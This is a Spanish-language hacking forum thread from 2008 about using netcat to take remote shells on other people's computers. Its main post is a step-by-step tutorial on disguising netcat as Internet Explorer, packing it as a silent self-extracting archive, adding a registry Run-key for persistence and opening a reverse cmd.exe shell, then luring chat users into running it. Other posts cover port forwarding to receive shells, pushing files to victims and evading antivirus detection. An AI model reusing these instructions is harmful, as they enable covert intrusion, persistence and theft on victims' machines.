Y vos como si nada lo podes llegar a hacer por no saber con que te metes. Primero aprende las bases... no es bardo, es un consejo, porque Linux sera muy seguro pero si no sabes como se hacen las cosas... estar seguro de tu seguridad solamente te sirve para estar más inseguro. Con eso yo me hago del control de tu máquina cuando se me canta.


Título: Re: Jugando con netcat
Publicado por: vitaepe en 29 Abril 2008, 06:38 am
bueno te doy la razon en lo de cmd.exe pero yo lo entendi como que abria la consola de la maquina en windows cosa que no ocurre, si efectivamente no se mucho del tema, pero prefiero equivocarme con un arma que no tiene balas, porque por algo pregunto, para luego cargarla y dispararle a quien se me plasca, un saludo! , voy a seguir informandome


Título: Re: Jugando con netcat
Publicado por: D4RIO en 29 Abril 2008, 12:59 pm
CREES que no tiene balas... pero:

Código:
nc -l -vv -e /bin/bash -p 4455

Abre tu shell al mundo... cualquiera que se tope con tu máquina será capáz de hacerle lo que quiera, porque con solo establecer una conexion estara en tu bash.
Si no tenes el sistema bien protegido seguramente un buen hacker sera capaz de obtener privilegios con bastante facilidad...


Título: Re: Jugando con netcat
Publicado por: cker en 29 Abril 2008, 23:17 pm
el hecho  de que tenga el nc metido en mi disco duro, no le sirve a cualquier persona para aduenarse de mi maquina, como si esta persona me la hubiera mandado?
saludos juanm.


Título: Re: Jugando con netcat
Publicado por: D4RIO en 30 Abril 2008, 18:53 pm
No... pero si sos de dejarlo a la escucha si. Es decir, nc es solo un programa, y si vamos al cosa no es el unico programa capaz de crear sockets o brindarte una shell... netcat no es un "segmento malicioso de codigo" ni nada que se le parezca, solo un buen programa escrito en C para brindar un control basico de las conexiones TCP y UDP.

Seria lo mismo usar un script en Perl, o un programa escrito en C++... o incluso programar algo mejor con posibilidades de transferencia de archivos de una "mejor" manera o más amigable y un shell propio.

Es un programa... nada más, ¿queres temerle a algo? Temele a Windows, o a eMule, o a la remota posibilidad de que la teoría Darwiniana regrese a su origen y mañana no seas más que un primate sacandote piojos de la espalda... no se, o a la recompresión cíclica del universo  :P


Título: Re: Jugando con netcat
Publicado por: cker en 30 Abril 2008, 23:36 pm
interesante tu respuesta gracias
saludos cker


Título: Re: Jugando con netcat
Publicado por: D4RIO en 1 Mayo 2008, 00:51 am
PERL:  Modulo IO::Socket
C++: Clase PracticalSockets (Mucho más fácil que el codigo de NetCat)


Título: Re: Jugando con netcat
Publicado por: edu2vb en 1 Mayo 2008, 13:52 pm
hello, quisiera hacer una preguntilla, vereis he troyanizado el netcat y me va bien, pero cuando estoy debajo de una red, la shell no me llega, claramente al troyanizar el netcat he cambiado la ip por la que tengo asignada a internet (ip dinamica:87.00.00.000) no me funciona, si utilizo la que me asigna la red ej:192.168.1.3 si puedo obtener la shell todas estas pruebas las he hecho conmigo mismo..! pero se que si logro que alguien ejecute el troyano y pongo la ip de mi red por supuesto no me va a llegar ni de broma a no ser que esa persona este dentro de mi red, lo dudo mucho seria una casualidad muy grande. entonces estoy obligado a poner la ip externa (dinamica) pero no me funciona ademas he probado con un dns de no-ip y tampoco funciona, que va funcionar si ni con la ip directamente no lo hace.!xD mi pregunta es.¿de que manera puede llegarme la shell remota dentro de una red?


Título: Re: Jugando con netcat
Publicado por: D4RIO en 2 Mayo 2008, 04:15 am
La red sale a Inet por un router o cortafuegos o existe un equipo que funcione a modo de alguno de estos dos?


Título: Re: Jugando con netcat
Publicado por: edu2vb en 2 Mayo 2008, 12:25 pm
no, veras te explico...
yo en algunos fines de semana me voy a casa de mis abuelos, y me llevo mi portatil, y cuando quiero conectarme un rato lo ago por wifi al vecino.xD.. la semana pasada estaba probando el netcat en casa y me funcionaba, luego el fin en casa de mis abuelos me conecte al vecino, y prepare mi netcat segun mi ip directa a internet y no me funcionaba como te dicho antes. supongo que es simplemente un router el que tendra el vecino por el que yo me conecto de vez en cuando, es lo unico que se..
si me puedes dar una luz para solucionarlo, para cuando vaya un fin tenerlo mas claro.. gracias


Título: Re: Jugando con netcat
Publicado por: D4RIO en 2 Mayo 2008, 12:59 pm
Bueno, el router puede limitarte ciertas cosas... recorda que un router tiene un sistema operativo (por ejemplo: los routers Cisco usan un SO basado en Unix) y puede implementar un firewall aparte del bloqueo de puertos.

Tendrías que ver si podes conectarte al router y configurarlo, o al menos ver cómo está configurado.


Título: Re: Jugando con netcat
Publicado por: edu2vb en 2 Mayo 2008, 13:05 pm
tienes razon, es posible que el tenga que ver con el router, entonces si se puede obtener un shell dentro de una red, aunke no seas el ordenador central..gracias D4RIO fue de gran ayuda. salu2


Título: Re: Jugando con netcat
Publicado por: Novlucker en 2 Mayo 2008, 13:32 pm
Es una pregunta que ya se ha hecho muchas veces, siempre que estés detrás de un router, es decir que tengas 2 ip's, la externa que te otorga el router, y la interna, la ip de red, ej 192.168.x.x, tendrás que abrir, redirigir o mapear los puertos que utilices para el nc desde el router a tu ip interna, de lo contrario las solicitudes de conexion que haga el netcat a tu pc, se quedarán en el router y no llegarán a ti  :-\

Espero te sirva  ;D

Saludos


Título: Re: Jugando con netcat
Publicado por: edu2vb en 2 Mayo 2008, 13:52 pm
osea que tengo que entrar en su router, dirigir la ip:puerto(xxx.xxx.xxx.xxx) > ip:puerto (192.x.x.x). vale y si por ejemplo si yo usara un exploit, en el que sale por un puerto y llega la shell por otro puerto.. tambien funcionaria.. ?


Título: Re: Jugando con netcat
Publicado por: Novlucker en 2 Mayo 2008, 14:13 pm
Debería de funcionar, debes de pensar que tu conectas a internet a traves de la ip que te otorga el router, para la web tu tienes esa ip, o sea que da igual el puerto por el que salgas, salvo que el router tenga además configurado un firewall o alguna restricción de salida, pero debes de tener presente que justamente por esto, es que actualmente no se te conecta el nc, como te dije, para la web, tu tienes esa ip, pero esa ip esta asociada al router, tu estás detrás del router, y es por eso que tienes que abrir una "ventana", un hueco, y decirle al router que la información que le llegue al puerto xxxx debe de redireccionarla a tu ip

Espero se entienda

Saludos


Título: Re: Jugando con netcat
Publicado por: marlon_agz en 2 Mayo 2008, 14:50 pm
mano no te entendi una papa :xD

le explicare con mis palabras, es igualito a cuando montas un servidor en una LAN :)


desde fuera, nosotros solo vemos tu ip (la del router del vecino), Si redireccionas el puerto que vas a usar por ejemplo, el puerto 80 a tu maquina, las conexiones desde afuera, por el puerto 80, van directo a tu maquina.


mas claro ni el agua :xD

y mira mas informacion... Link (http://es.wikipedia.org/wiki/Redireccionamiento_de_puertos) :)


salu2


Título: Re: Jugando con netcat
Publicado por: edu2vb en 2 Mayo 2008, 15:34 pm
la verda eske lo he entendido a la perfeccion :), muchisimas gracias a ambos de veras estoy muy agradecido,espero poder entrar en ese router y poder configurarlo a mi necesidad sin causar muchos problemas al pobre vecino,jeje salu2


Título: Re: Jugando con netcat
Publicado por: softdates en 10 Mayo 2008, 01:42 am
http://www.usuarios.lycos.es/orlyyan/index.html

aqui encontraran todo sobre netcat


Título: Re: Jugando con netcat
Publicado por: HM-CrasH en 10 Mayo 2008, 14:51 pm
Muy buen aporte. Gracias


Título: Re: Jugando con netcat
Publicado por: tyldan en 18 Mayo 2008, 14:30 pm
Hola a todos,
Quiero saber el punto de la situacion sobre el utilizar el NetCat como trojan  (estas preguntas son para el netcat en modo "reverse conection").
 
 -El unico que bloquea el netcat puede ser un Firewall, verdad?
 -Existe un server del netcat para ver quales IP intentan conectarse en un puerto de tu computadora?
 -Si la victima tiene un firewall (como el Kaspersky... osea No Windows) bloquea la shell?

Mis pruebas acabaron con exito tambien cuando el firewall de windows estaba activo.


P.S sorry por el espanol... soy italiano, pero creo que me explique xD


Título: Re: Jugando con netcat
Publicado por: Novlucker en 19 Mayo 2008, 03:52 am
Citar
-El unico que bloquea el netcat puede ser un Firewall, verdad?
Firewall o AV, cualquiera de los dos puede dejar sin funcionamiento el netcat
Citar
-Existe un server del netcat para ver quales IP intentan conectarse en un puerto de tu computadora?
No, no lo hay, si quieres tener varias víctimas deberías de utilizar puertos distintos, así te evitas problemas  :-\
Citar
-Si la victima tiene un firewall (como el Kaspersky... osea No Windows) bloquea la shell?
Seguramente si lo bloqueará, ya que la mayoría de los firewall revisan las conexiones de salida, salvo que el programa este en las excepciones
Citar
Mis pruebas acabaron con exito tambien cuando el firewall de windows estaba activo.
Eso es porque lo estás haciendo con conexión inversa, y el firewall de windows solo controla las conexiones entrantes, pero bueno, ese firewall da lastima  :xD

Saludos


Título: Re: Jugando con netcat
Publicado por: Kont en 19 Mayo 2008, 08:47 am
podria utilizar netcat en una red wireless?? es decir yo me conecto desde una laptop utilizando la tergeta de red inalambrica, y las demas host no utilizan la tarjeta inalambrica si no que se encuentran conectados mediante cable, podria obtener una shell en las maquinas conectadas por cable??

gracias.


Título: Re: Jugando con netcat
Publicado por: tyldan en 19 Mayo 2008, 12:36 pm
Wueno, acabo de hacer un Programa en Perl para "eschuchar" una puerta y ver los IP que intentan conectarse.
Despues el programa llama el netcat con estos parametros:
" start nc -L -vv -p "puera" -n "IP"
Si NO tienes el netcat en System32 no sirve
Si tienes el Netcat en system32 pero no se llama  nc.exe no sirve igual (entonces tienes que correger el nombre)
Para ejecutar ese programa tienes que instalar un interprete Perl (Active Perl o lo que sea) y poner sobre la consola "perl NombrePrograma.pl puerta"
Aqui le dejo el programa:
Código:
#!/usr/bin/perl

use IO::Socket;


my $port = shift or die "Uso: $0 <puerta>\n";



while(1){

system("cls");
 
print "\nInserta cuantos minutos quieres escuchar: ";

my $servsock = new IO::Socket::INET(
        LocalPort => $port,
        Proto => 'tcp',
        Listen => 1,
        Reuse => 1,
) or die "Impossible crear el socket: $!\n";

my $temp=<STDIN>;
my $temp2=$temp*60;

$data=(time()+$temp2);

print "\nEscuchando sobre la puerta ".$port."...\n";


$c=0;

while ($data >= (time())){
 
  $f=0;

  my $sock=$servsock->accept();

    for ($i=0;$i<$c;$i++){
      if ($sock->peerhost()==$DB[$i]){
         $f=1;
      }
    }
   
    if ($f==0){
      push (@DB,$sock->peerhost());
      $c++;
    }
  close ($sock);
}
chomp($temp);
close($servsock);
print "\nEn estos ".$temp."minutos, los IP que intentaron conectarse son:\n";

my $sis;

for ($i=0;$i<$c;$i++){
  $temp2=$i+1;
  print "\n";
  print $temp2;
  print "-";
  print $DB[$i];
}
my $scelta= "s\n";

while ($scelta eq "s\n"){
print "\n\nInserta el numero (indice) del ip que quieres hacer conectar:";
$temp=<STDIN>;
chomp ($temp);
$temp=$temp-1;
$sis="start nc -L -vv -p ".$port." -n ".$DB[$temp];
print $sis;
system ($sis);
print "\nQuieres hacer conectar otro IP? (s/n):";
$scelta=<STDIN>;
}
for ($i=0;$i<$c;$i++){
pop(@DB);
}
}


Título: Re: Jugando con netcat
Publicado por: tyldan en 19 Mayo 2008, 12:41 pm
Tiene un pequenito problema.
Si por ejemplo no tienes victimas que intentan conectarse el programa espera un tempo infinito. (pq no se utilizar los Forks)


Título: Re: Jugando con netcat
Publicado por: D4RIO en 19 Mayo 2008, 15:17 pm
Al reves, el problema de no utilizar fork es que si intentas escuchar con varias victimas no podrás hacerlo, solo una a la vez hasta que finalice la ejecucion de system por salir nc de su ejecucion. De todas formas todo el code está medio dudoso, poco práctico y muy poco perlero... como escrito a las apuradas. Por dar un ejemplo:

Código
  1. print "\nInserta cuantos minutos quieres escuchar: ";
  2.  
  3. my $servsock = new IO::Socket::INET(
  4.        LocalPort => $port,
  5.        Proto => 'tcp',
  6.        Listen => 1,
  7.        Reuse => 1,
  8. ) or die "Impossible crear el socket: $!\n";
  9.  
  10. my $temp=<STDIN>;


En esa parte, si new IO::Socket::INET() falla y el or pasa al otro lado con el die, tu programa pedira "Inserta cuantos minutos quieres escuchar: " y luego, así como así... CRASH!

a demas de my $temp=<STDIN>, que te dejara un fin de línea, si no me equivoco.

esta otra parte tambien me resulto dudosa (Tal vez por el estado somnoliento):

Código
  1. my $temp=<STDIN>;
  2. my $temp2=$temp*60;
  3.  
  4. $data=(time()+$temp2);

y al final:
Código
  1. for ($i=0;$i<$c;$i++){
  2.  $temp2=$i+1;
  3.  print "\n";
  4.  print $temp2;
  5.  print "-";
  6.  print $DB[$i];
  7. }

se usaria un foreach porque el objetivo es recorrer el array. Por ultimo podrias evaluar el uso de matrices asociadas (en jerga perlera: Hashes) para simplificar el logging de las conexiones.

Se ve que tenes buena base de programación, pero no usas las practicidades de Perl.

Y un ultimo consejo: Si te gusta Perl deja de una vez a Microsoft y venite para Linux, donde Perl esta en su salsa.


Título: Re: Jugando con netcat
Publicado por: tyldan en 19 Mayo 2008, 16:04 pm
Yo programo en C pero no se utilizar los Sockets,
por eso hize un programa en Perl, porque me parecia mas facil.
El problema es que llevo 5 dias "leyendo" el Perl (pues.. empeze desde zero)
por eso no soy muy pratico y programando casi siempre en C, no me doy cuenta de algunas cosas (por ejemplo utilizando el for y no el foreach).
Si alguien puede mejorar el codigo que lo haga,
simplemente necesitaba algo para no cambiar puerto cada vez y mi intento era ver los ip de las victimas y conectarme una a una.

Citar
Al reves, el problema de no utilizar fork es que si intentas escuchar con varias victimas no podrás hacerlo, solo una a la vez hasta que finalice la ejecucion de system por salir nc de su ejecucion

Mi llamada de sistema es un start, osea abre otra ventana, entoces el system acaba en un Clock.


Citar
a demas de my $temp=<STDIN>, que te dejara un fin de línea, si no me equivoco.

si pero eso no influje sobre la convercion, hize pruebas.

Citar
se usaria un foreach porque el objetivo es recorrer el array. Por ultimo podrias evaluar el uso de matrices asociadas (en jerga perlera: Hashes) para simplificar el logging de las conexiones.

de eso no me di quenta, pero no es fondamental.
[voy a leerme algo sobre los hashes  ;D]

Gracias por tus comentarios, se vee que tienes experiencia pero soy un newbee del perl.


Título: Re: Jugando con netcat
Publicado por: D4RIO en 19 Mayo 2008, 19:47 pm
No te creas que llevo mucho tiempo en Perl, pero mi experiencia es porque desde que empece hice lo mejor:

- Lei lo que más pude de las manpages de Linux
- Leí codigo de otros a más no poder
- Lei dos o tres manuales de referencia
- Programe cuanta pavada se me ocurrio para adquirir experiencia

Por cierto, en C++ es más simple manejar los sockets que en C.


Título: Re: Jugando con netcat
Publicado por: chalo11 en 24 Mayo 2008, 05:36 am
hola amigos :D saben tengo un problema, que al momento de subirle un archivo a la victima, desde la chell remota obtenida, lo hago con el siguiente comando

nc -vvlp 123 > archivo (ese comando desde la chell remota)

y luego en mi maquina,despues de hacer un DIR para buscar el archivo a subir coloco el siguiente comando:

nc ipvictima 123 < archivo.exe (maquina atacante).

mi problema es que al momento de ir a verificar el archivo subido este solamente tiene el nombre.exe y con un peso de 0 bytes y como saben no se puede ejecutar.
que error estoy cometiendo? ojala me puedan ayudar.

PD: todo el procediminto de obtener la chell  lo hice desde mi misma maquina 127.0.0.1 utilizando el puerto 6000. sera este el error? o acaso igual deberia subir el archivo con su respectivo peso?   


Título: Re: Jugando con netcat
Publicado por: D4RIO en 24 Mayo 2008, 20:34 pm
Usa ftp en el shell remoto para bajar contenidos que previamente alojaste en cualquier lado (puede ser tu mismo ordenador) y se comparten por ftp (con un ftpd), y asi le podras pasar el wget. Con el wget podras bajar lo que quieras y cuando quieras incluso desde HTTP.


Título: Re: Jugando con netcat
Publicado por: chalo11 en 24 Mayo 2008, 20:47 pm
buena compa gracias por tu ayuda lo unico si que no entiendo mucho lo del  wget  ;D me podrias explicar que es? o como se utiliza.

bueno ....de nuevo gracias por tu auyda y tiempo.  :D


Título: Re: Jugando con netcat
Publicado por: D4RIO en 26 Mayo 2008, 04:10 am
googlea un poco... wget es una de las herramientas más usadas en gnu/linux (de hecho es software GNU) y tiene un porte a windows. Como tan usada herramientas cuenta con su manpage y mucha documentacion en la red, aunque básicamente la podes usar como: wget http://tudominio.com/archivo a descargar y así podes combinar eso con el uso de un servidor en tu máquina (como Apache o HFS) para sincronizar los archivos que desees (pe: creas una carpeta "utils" en tu máquina y haces un script en la máquina ajena que mantenga todo el contenido de "utils" en el system32 de la máquina ajena. despues un sistema de protección propia y yá comenzas a armar tu red, eso si... si lo haces sin el consentimiento ajeno te atenes a las consecuencias)


Título: Re: Jugando con netcat
Publicado por: D4RIO en 28 Mayo 2008, 04:37 am
No uso el messenger, menos para esto. Podes usar mjes privados en el foro para contactarte conmigo, o este mismo hilo, y me vas a econtrar más seguido, de otra forma tal vez me cruces en el IRC, en FreeNode, en algun canal de debian, linux o cosas por el estilo... si me cruzas es pura casualidad.

Primero leete esto:
http://es.wikipedia.org/wiki/TCP/IP
http://es.wikipedia.org/wiki/UDP
http://en.wikipedia.org/wiki/Netcat
http://es.wikipedia.org/wiki/Netcat

Y vas a estar más informado sobre el tema. Después planteate: ¿Hay routers o Firewalls en la red que puedan impedir la conexion?

Por ultimo, vuelvo a pedirte: ¿Me explicas cual es exactamente el problema?


Título: Re: Jugando con netcat
Publicado por: D4RIO en 2 Junio 2008, 07:04 am
usa el boton "buscar" y encontraras lo que bucabas, porque ya se ha hablado en repetidas ocasiones en éste mismo hilo. La opcion más simple para que no salga la "ventanita" al ejecutarse el sfx es usar un vbs que actue de intermediario (usa buscar y encontraras esto), aunque yo prefiero hacerlo desde otro programa previamente hecho en AutoIt, C, C++ o cualquier otro, siendo preferible en alguno chiquito como HLA (High Level Assembler).
El tema de la conexión deberás revisarlo a base de pings, comprobaciónes, tracebacks y otros. Es el preciso momento en el que debes perfeccionar tus técnicas leyendo horas y horas, o hacer lo que hace la mayoría: Desfallecer y conformarse con decir ser hacker deshonrando el nombe y vendiendo software ilegal (Esperemos no seas de estos ultimos)


Título: Re: Jugando con netcat
Publicado por: Elendil8379 en 2 Junio 2008, 07:53 am
excelente post sobre netcat habia hecho algo parecido con un software alternativo al vnc muy weno saludos desde Venezuela


Título: Re: Jugando con netcat
Publicado por: nuflaco en 10 Junio 2008, 05:12 am
hola!! soy recien llegado a este foro, la verdad q encontre varias cosas muy interesantes, pero aqui mi inquietud:

Hay alguna manera de acceder con el netcat a una shell en una maquina remota que esta a la vez dentro de una lan, pero sin redireccionar los puertos del router manualmente?

El caso seria asi: tenemos una red de x maquinas, administradas por un router que les da ip y acceso a internet (claro...). Desde una maquina ajena a esta red, quiero abrir una shell de una de las maquinas de de la red, a traves de internet, pero, como todos sabemos, tengo q redireccionar los puertos en el router asi mi peticion es enviada directo a la maquina victima, sino se muere en el router. Como puedo hacer esto sin tener que crear las reglas manualmente? hay alguna manera con UPnP o algo de eso?

Muchisimas gracias a todos!


Título: Re: Jugando con netcat
Publicado por: leogtz en 12 Junio 2008, 00:26 am
Sugerencias y dudas sobre el foro :

http://foro.elhacker.net/sugerencias_y_dudas_sobre_el_foro-b10.0/ (http://foro.elhacker.net/sugerencias_y_dudas_sobre_el_foro-b10.0/)


Título: Re: Jugando con netcat
Publicado por: miau30 en 18 Junio 2008, 18:28 pm
Buenas!
he estado poniendo en práctica esto del netcat, y me he encontrado con un problema. Me es imposible crear el programa que me conectará con "la victima". Resulta que al poner en dos c:\>WINDOWS>nc -vv -L -p 80, me pone algo como "windows no se reconoce como un comando interno o externo, programa o archivo por lotes ejecutables". En realidad os pediría que alguien me explicara de modo breve como se hace este paso. Perdonar mi ignorancia, pero soy un auténtico novato en esto.

Muchas gracias y saludos.


Título: Re: Jugando con netcat
Publicado por: leogtz en 18 Junio 2008, 18:47 pm
Pueden ser estas dos :

-Te estas equivocando en la sintaxis.
-No tienes a Netcat(nc.exe) en C:\Windows o en C:\windows\System32 (Colocalo en alguno de esas dos rutas).

Y pos si te sale Acceso Denegado, es por tu Antivirus.

Saludos.


Título: Re: Jugando con netcat
Publicado por: D4RIO en 18 Junio 2008, 21:49 pm
El problema es que queres usar netcat y no sabes usar CMD... Windows no lo tenes que poner  :¬¬


Título: Re: Jugando con netcat
Publicado por: CRISTIAN_DAVID en 24 Junio 2008, 00:13 am

JUGANDO CON NETCAT V1.1
                Parte I


Como ya les habrán enseñado a utilizar el netcat, ahora yo les quiero enseñar como sacarle el jugo a este programilla muy útil… lo convertiremos desde un troyano hasta un cliente SMTP entre otras cosas.


TROYANIZANDO NETCAT

Como ya saben, con netcat puedes tomar una shell directamente o realizar una conexión inversa indicando mi IP o dirección DNS (para los que no saben lo que es un DNS… es un tipo de traducción que hace mas fácil poder encontrar tu PC, por ejemplo la IP 200.32.22.25 sería el DNS = pagina.cl ).

Bueno… primero hay que saber lo que vamos a hacer… la idea principal será tomar una shell de la PC de cualquier persona de un IRC (Chat).

Materiales:
ResHacker
Netcat v1.1
Winrar (Modo grafico)
Un icono de Internet Explorer.

Bueno, si no saben donde encontrar el icono tratare de dárselos con este documento XD si no se puede pueden usar cualquier otro icono (puedes hacerlo sin iconos también pero se verá sospechoso.)

Lo primero es conectarse a un Chat XD y conseguirse a alguna victima (ojala no lo hagan con sus novias porque si los pillan los van a patear XD ) … una ves que digan.. “esa es mi victimaaaaa!!!”  entonces usaremos algo que se llama ingeniería social y es a través del ingenio propio hacerse pasar por alguien o hacerse de la amistad de esa persona para poder obtener lo que queremos, la idea es que hablaremos con el y bla bla bla de donde eres bla bla bla… cuando termines le dices que otro día seguimos conversando… si todo va bien ps ya mañana tendrás la confianza suficiente como para darle un programa que le ayudará en el mantenimiento de su PC o que simplemente se divierta con un juego XD.

Dejamos de lado el Chat y en la noche nos ponemos a hacer el troyano de la siguiente forma:

Paso 1: Primero le cambiamos el icono para que sea menos sospechoso con el ResHacker:

(http://www.jccharry.com/imagenes/1.gif)

En primer lugar abres el ResHacker y le das en "File/Open" y buscas el netcat. Después pinchas en acción y luego en "Add a new Resource", luego se verá la ventana que ves a la derecha y presionas donde dice “Open file with new resource” (paso 3) para buscar el icono que teniamos, luego donde dice “Resource Name” Debes escribir la palabra “ICON” tal como se ve en la foto y para finalizar presionamos en “Add Resource” y en “File/Save”. Con todo esto te creará un respaldo del netcat original que puedes borrarlo con toda tranquilidad y al refrescar la pantalla (F5)  veras que el netcat tiene el mismo icono de Internet Explorer XD

(http://www.jccharry.com/imagenes/2.gif)

Paso 2: renombramos nc.exe y desde ahora se llamará “iexplorer.exe” XD, luego pinchas el netcat con el botón derecho de tu Mouse y deberá aparecer algo así (obviamente después de haber instalado el winrar.)

(http://www.jccharry.com/imagenes/3.gif)

Luego aparecerá el Winrar y empezaremos a crear nuestro troyano:

1.

(http://www.jccharry.com/imagenes/4.gif)

Donde dice “Nombre del archivo” le escribimos “carnada.exe” (por ahora), el formato debe ser en “RAR” el método de compresión el mejor y por último y mas importante “Crear un archivo SFX”, el resto debe quedas deseleccionado.


2.

(http://www.jccharry.com/imagenes/5.gif)

En la pestaña “Avanzado” (arriba) debes pinchar el botón llamado “Opciones SFX” y comenzaremos a configurar nuestro Winrar SFX.


3.

(http://www.jccharry.com/imagenes/6.gif)

Ahora en “Carpeta de extracción” le diremos que descomprima el netcat (con nombre de iexplorer) en el directorio = %homedrive%%homepath%\update , ahora me diran: “Que es esto?!!”… %homedrive% significa que se descomprimirá dentro de la misma unidad de disco que esté Windows, o sea comúnmente (no siempre) “C:\” … %homepath% significa “Documents and settings\tu usuario actual” en conclusión se descomprimirá dentro del directorio raiz del usuario donde es casi el único lugar donde un usuario sin derechos de administrador puede sobrescribir, en otras palabras si le hubiese escrito %windir%\system32 pudiera haber tenido fallas al descomprimirse ya que no todos tienen derecho a ese directorio. Elegí una carpeta llamada update para llamar menos la atención.
En “Ejecutar tras la extracción” le escribimos esto = iexplorer.exe -d -e cmd.exe [aca va nuestra ip] 80 , yo le puse la dirección 127.0.0.1 para pruebas pero ustedes le ponen la ip real que sale a Internet. 80 es el puerto donde el troyano se conectará con nosotros.

En “Ejecutar antes de la extracción” le escribimos lo siguiente = %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe 127.0.0.1 80" /f > nul … y ustedes me diran que es eso!!!!... le decimos que ejecute la consola de comandos CMD y llame a un ejecutable llamado “REG.EXE” el cual se encargará de agregar nuestra entrada al registro del sistema para que el troyano arranque solito cada ves que encienda la pc (recordar que donde dice 127.0.0.1 deben poner la ip de ustedes o en algunos casos (para los que saben) su DNS… es mas efectivo. (Consultar por el no-ip) y donde dice >nul significa que la victima no verá mas que un simple pestañazo del DOS en ves de mostrar todo lo que se está ejecutando.


4.

(http://www.jccharry.com/imagenes/7.gif)

Acá estamos pidiendo a winrar que no muestre nada mientras se instala todo esto, asi será mas silencioso, rápido y automatizado.


5.

(http://www.jccharry.com/imagenes/8.gif)

Por último cargamos un icono atractivo para que se vea con el troyano ya compilado y aceptamos todas las ventanas.


Debería quedar algo así:

(http://www.jccharry.com/imagenes/9.gif)

Yo le puse icono de yahoo porque lo voy a probar desde el mismo Chat.


Ahora vamos a crear el programa que nos conectará con la victima, y se llama “Cliente”
Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada:

(http://www.jccharry.com/imagenes/10.gif)

Y listo :D ahora solo falta visitar a nuestro amigo del día anterior y decirle que tienes un juego muy chido o que tienes algo para no se… usa tu imaginación. En mi caso y entré a una sala de yahoo y como hoy en día esta muy de moda los booters XD puse en sala que bajaran un antibooter para que no los pudieran sacar de la sala y les pase un link con la dirección donde estaba alojado el troyano. En resumidas cuentas… si alguien cae en tus maldades te debe aparecer esto:

(http://www.jccharry.com/imagenes/11.gif)

Habrás tomado la shell de otra PC (manejar una shell de otra pc significa poder controlar el DOS de Windows o la shell de GNU.. es poder controlar la consola de comandos de la otra persona y a través de eso puedes subirle archivos, borrarle cosas, darle troyanos que te permitan ver su escritorio… mirar sus contraseñas volcando el registro en textos y asíéndoles un “type”… para los que saben un poquitito mas.. talvez saltar a otras pc con netbios, exploits como el dcom, acceder a servidores y dominar una red completa y ufff.. a volar la imaginación. Si no me creen miren estas tres capturas jugando con netcat XD nada serio:


1. El sueño de todo lamer XD :

(http://www.jccharry.com/imagenes/12.gif)


2. Subiendo RealVnc4 para poder hacer una conexión iversa y mirar el escritorio de la otra persona:

(http://www.jccharry.com/imagenes/13.gif)


3. Esto fue un ajuste de cuentas XD:

(http://www.jccharry.com/imagenes/14.gif)


Les mostré como crear un troyano con netcat (indetectable por todos los antivirus por ahora) también puede hacerse con una conexión directa en ves de una inversa como la hice acá, así como ya saben hacerlo ;)

Esto es todo y espero poder mostrarles la próxima ves.. como convertir el Netcat v1.1 en un cliente SMTP para enviar correos automatizados y temporizados además de servir como cliente FTP con comandos automatizados sin la necesidad de la intervención de escribir los comandos desde la consola, también como ponerle contraseña a una sesión de shell con netcat entre muchas otras cosas mas ;)

Video ahún mas explicativo: http://whk.h4ck1ng.net/
El video está en la sección de descargas.

Preguntas mas frecuentes:
¿Porque me aparece que el archivo no existe?
R: http://foro.elhacker.net/index.php/topic,159799.msg860791.html#msg860791

¿Porque me dice error win32?
R: Estas intentando cambiar el icono al netcat V1.1, intenta con el 1.0

¿Porque me dice ""nc" no es un comando reconocido"?
R: http://foro.elhacker.net/index.php/topic,159799.msg758631.html#msg758631

¿Porque me aparece "h_errno 11001: HOST_NOT_FOUND" ?
R: http://foro.elhacker.net/index.php/topic,159799.msg754376.html#msg754376

Salu2 Att. Yan.
Unilola Software.




OYE MNE HARIAS EL FAVIR DE ENVIARME LAS DIRECCIONES DONDE PUEDO ENCONTRAR ESOS PROGRAMAS
Y ES QUE ESTUVE LEYENDO Y NO ENCONTRE COMO USAR EL NETCAT
TE SOLICITARIA UNA AYUDITA SI PLIS GRACXIE
ESO SIENDO TODO ME DESPIDO
BN LUNAS Y SAG ETERNA


Título: Re: Jugando con netcat
Publicado por: Martín Fierro en 24 Junio 2008, 05:59 am
hola!! soy recien llegado a este foro, la verdad q encontre varias cosas muy interesantes, pero aqui mi inquietud:

Hay alguna manera de acceder con el netcat a una shell en una maquina remota que esta a la vez dentro de una lan, pero sin redireccionar los puertos del router manualmente?

El caso seria asi: tenemos una red de x maquinas, administradas por un router que les da ip y acceso a internet (claro...). Desde una maquina ajena a esta red, quiero abrir una shell de una de las maquinas de de la red, a traves de internet, pero, como todos sabemos, tengo q redireccionar los puertos en el router asi mi peticion es enviada directo a la maquina victima, sino se muere en el router. Como puedo hacer esto sin tener que crear las reglas manualmente? hay alguna manera con UPnP o algo de eso?

Muchisimas gracias a todos!

Usa hamachi, es un software que te permite crear redes vpn la única pega es que tendrás que instalarlo y asociar la pc a la que quieras acceder a una red virtual hamachi, el programa te dará una ip virtual a la que deberás conectarte desde el remoto, claro el remoto también deberá tener instalado el hamachi y pertenecer a la misma red que la otra, así que si dejas un puerto abierto con nc, podrás acceder comodamente desde el remoto con la ip virtual.

¿A poco creías que el Hamachi solo sirve para jugar online? Tiene mil y un uso si lo asocias a otros programas maravillosos como el nc, y es por decir algo, vnc y cualquier troyano que te abra un puerto..


Título: Re: Jugando con netcat
Publicado por: 1001 en 26 Junio 2008, 16:10 pm
alguin sabe dnd descargar netcat seguro?
ja s k t lo detectan como virus.


Título: Re: Jugando con netcat
Publicado por: Novlucker en 26 Junio 2008, 16:20 pm
Eso es porque el nc es detectado por los AV

Igualmente no quita que el que tienes pude tener regalito  :P

Saludos


Título: Re: Jugando con netcat
Publicado por: 1001 en 29 Junio 2008, 20:38 pm
Por eso lo digo y hace poco me entro troyano, asin que no fio mucho de mis descargas.
gracias


Título: Re: Jugando con netcat
Publicado por: Martín Fierro en 4 Julio 2008, 00:03 am
Si quieres un nc que no sea detectado buscate el código fuente y compilalo tu mismo, claro que hazle laos cambios pertinentes para que no te griten los AVs, anda estoy seguro que puedes..

Te advierto la compilación del nc tiene sus detalles no es tan fácil pero me imagino que podrás y si no pues pregunta..


Título: Re: Jugando con netcat
Publicado por: WHK en 9 Julio 2008, 06:49 am
Un regalo para que sigan jugando con NetCat XD
Hice un nuevo NetCat que debería serf indetectable por muchos antivirus. Aunque hay mas formas de hacerlo solamente lo empaqueté en armadillo con certificado propio y sin mensaje de bienvenida.

Netcat Indetectable (No para el 100% de los av.)
